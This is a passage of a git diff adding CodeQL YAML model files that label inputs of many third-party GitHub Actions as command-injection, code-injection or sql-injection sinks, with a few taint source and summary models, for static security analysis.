ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 00000000000..e3d97adf69d --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e..cd409f38b59 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe222..ad65775e58d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 00000000000..c530a3af9b3 --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml new file mode 100644 index 00000000000..c632a3a1ff2 --- /dev/null +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] + - ["anchore/sbom-action", "*", "input.format", "command-injection"] + - ["anchore/sbom-action", "*", "input.path", "command-injection"] + - ["anchore/sbom-action", "*", "input.file", "command-injection"] + - ["anchore/sbom-action", "*", "input.image", "command-injection"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml new file mode 100644 index 00000000000..26e5adea505 --- /dev/null +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml new file mode 100644 index 00000000000..2903888a731 --- /dev/null +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml new file mode 100644 index 00000000000..21dcd22c8b7 --- /dev/null +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml new file mode 100644 index 00000000000..236eade34a6 --- /dev/null +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml new file mode 100644 index 00000000000..c0e11c8201f --- /dev/null +++ b/ql/lib/ext/azure_powershell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml new file mode 100644 index 00000000000..2841f406bda --- /dev/null +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml new file mode 100644 index 00000000000..aa060de610d --- /dev/null +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef09..7d5f699a0e9 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2..aeda7998631 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 00000000000..38b18cf6cac --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5..2e4291eb480 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 00000000000..3be7669275c --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 00000000000..cb0870b4883 --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 00000000000..30e59e91d60 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c..f3b021d226b 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 00000000000..25df02dacaa --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 00000000000..2fda092f20a --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml new file mode 100644 index 00000000000..324171f3c4b --- /dev/null +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml new file mode 100644 index 00000000000..cc5c311eea7 --- /dev/null +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml new file mode 100644 index 00000000000..f45aae02158 --- /dev/null +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml new file mode 100644 index 00000000000..7445d673fcf --- /dev/null +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 00000000000..a8a54dbda29 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872..82f491390d2 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 00000000000..430a96f6cbe --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 00000000000..37bcf2cc781 --- /dev/null +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml new file mode 100644 index 00000000000..77eaf3ae10f --- /dev/null +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml new file mode 100644 index 00000000000..63cdb2a496b --- /dev/null +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] + - ["endbug/latest-tag", "*", "input.description", "command-injection"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml new file mode 100644 index 00000000000..d0bcbb4da98 --- /dev/null +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 00000000000..6418e71f22a --- /dev/null +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml new file mode 100644 index 00000000000..86705319e23 --- /dev/null +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 00000000000..61fdcd9254a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e975..2d142d98099 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 00000000000..1727ca60e25 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 00000000000..146f4a17a55 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml new file mode 100644 index 00000000000..8c0f7a5ad61 --- /dev/null +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 00000000000..9c7c03b9f35 --- /dev/null +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml new file mode 100644 index 00000000000..9d9eac38af0 --- /dev/null +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 00000000000..4c74301d1c3 --- /dev/null +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 00000000000..6332cbfdad8 --- /dev/null +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml new file mode 100644 index 00000000000..f8b8490c213 --- /dev/null +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml new file mode 100644 index 00000000000..64024ef5c72 --- /dev/null +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 00000000000..1771ac2bad0 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 00000000000..e8600c6f7df --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 00000000000..2ab70905db1 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 00000000000..948be24b45c --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 00000000000..928c1f918d3 --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2..ad95f1f323a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 00000000000..b3cb5aa3940 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 00000000000..a84880cfdf1 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ 